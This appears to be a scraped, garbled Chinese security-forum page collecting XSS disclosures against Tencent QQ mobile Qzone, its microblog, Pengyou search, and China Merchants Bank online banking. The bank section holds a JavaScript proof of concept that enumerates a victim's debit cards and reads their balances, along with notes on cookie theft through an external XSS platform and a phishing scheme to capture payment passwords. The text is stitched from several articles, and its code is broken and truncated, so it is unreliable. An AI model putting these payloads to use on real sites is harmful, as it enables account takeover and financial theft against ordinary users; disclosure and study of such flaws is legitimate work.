xss这些是什么手机品牌品牌的手机

腾讯qq手机空间及微薄的xss - 网站安全 - 红黑联盟
腾讯qq手机空间及微薄的xss
手机空间留言板表情采用[em]e100[/em](为笑脸表情)格式。可将恶意代码插入到[em]e100&xss&[/em]进行攻击,盗取用户的身份验证信息并访问用户的空间。然后查看隐私相册等私密内容。
其他不再做详细证明。恶意代码可随意构造。
作者:Valo洛洛
在建立微博名单时,向description字段注入JS并保存为所有人可见,当任何人查看建立的该名单页面时,XSS被触发执行! POC效果如下图:
漏洞证明:
修复方案:
作者:WebSPRing&>&&>& > 正文
来自腾讯手机端的一个xss
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
一不小心就看见了,求一邀请码
详细说明:
手机端朋友网的搜索好友,引发的xss,自己利用了下,还行。
漏洞证明:
修复方案:
过滤和限制长度
厂商回应:
危害等级:无影响厂商忽略
忽略时间: 14:49
厂商回复:
非常感谢您的报告,该问题并不影响其它用户安全,故暂不做处理。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理
最新状态:
您对本文章有什么意见或着疑问吗?请到您的关注和建议是我们前行的参考和动力&&招商银行网银定向xss通杀网页、PC端及手机APP(可定向窃取信息钓鱼种马)
招商银行网银定向xss通杀网页、PC端及手机APP(可定向窃取信息钓鱼种马)
编辑日期: 字体:
以下是用客户端做的测试
招商银行网银自助转账的留言处存在存储型xss,
查询交易记录的时候触发
可加载执行外部js,
利用xss平台获取cookie
这里还找piaca帮忙写了一个获取余额的poc
xmlhttp = new ActiveXObject(&Msxml2.XMLHTTP.3.0&);
function getBalance(cardNo, clientNo){
var url = &/CmbBank_PB/UI/PBPC/DebitCard_CustomerService/cs_HomePageAnalyzer.aspx&;
var postData = &Params=%253CAccountUID%253E& + cardNo + &%253C%252FAccountUID%253E&CardIndex=1&ClientNo=& + clientNo + &&PRID=GetBalanceXmlCmbBank&HASH=0.6853&
xmlhttp.Open(&POST&, url, false);
xmlhttp.setRequestHeader(&Content-Type&, &application/x-www-form-urlencoded&);
xmlhttp.send(postData);
return xmlhttp.responseT
window.onload = function(){
var clientNo = document.getElementById(&ClientNo&).
var cards = &&;
var card = document.getElementById(&ddlDebitCardList&).getElementsByTagName(&option&);
var cardLength = card.
for(var i=0;i&cardLi++){
var resp = getBalance(card[i].value, clientNo);
var balance = resp.match(/&HQYE&(.*?)&//HQYE&/)[1];
cards = cards + card[i].value + &=& + balance + &|&;
}catch(e){}
alert(cards);
因为转账需要支付密码所以没办法直接转账,不过可利用此xss做一个钓鱼页面先获取支付密码再进行转账操作也是可行的。
在这样的页面下让输入银行卡支付密码了别说是没有安全意识的人了,就算是有安全意识的人估计会中招的也不会少,所以危害还是挺大的。
经测试招行网银网页版和手机客户端均存在这样的问题
本文固定链接:
转载请注明:
作者:Tammie34Nv
这个作者貌似有点懒,什么都没有留下。
您可能还会对这些文章感兴趣!赶集网手机弹窗执行xss指谁打谁 - 网站安全 - 红黑联盟
赶集网手机弹窗执行xss指谁打谁
1,通知界面&
2,随便找个人
修补建议:
过滤掉那里吧

我要回帖

更多关于 手机空间 xss 的文章

 

随机推荐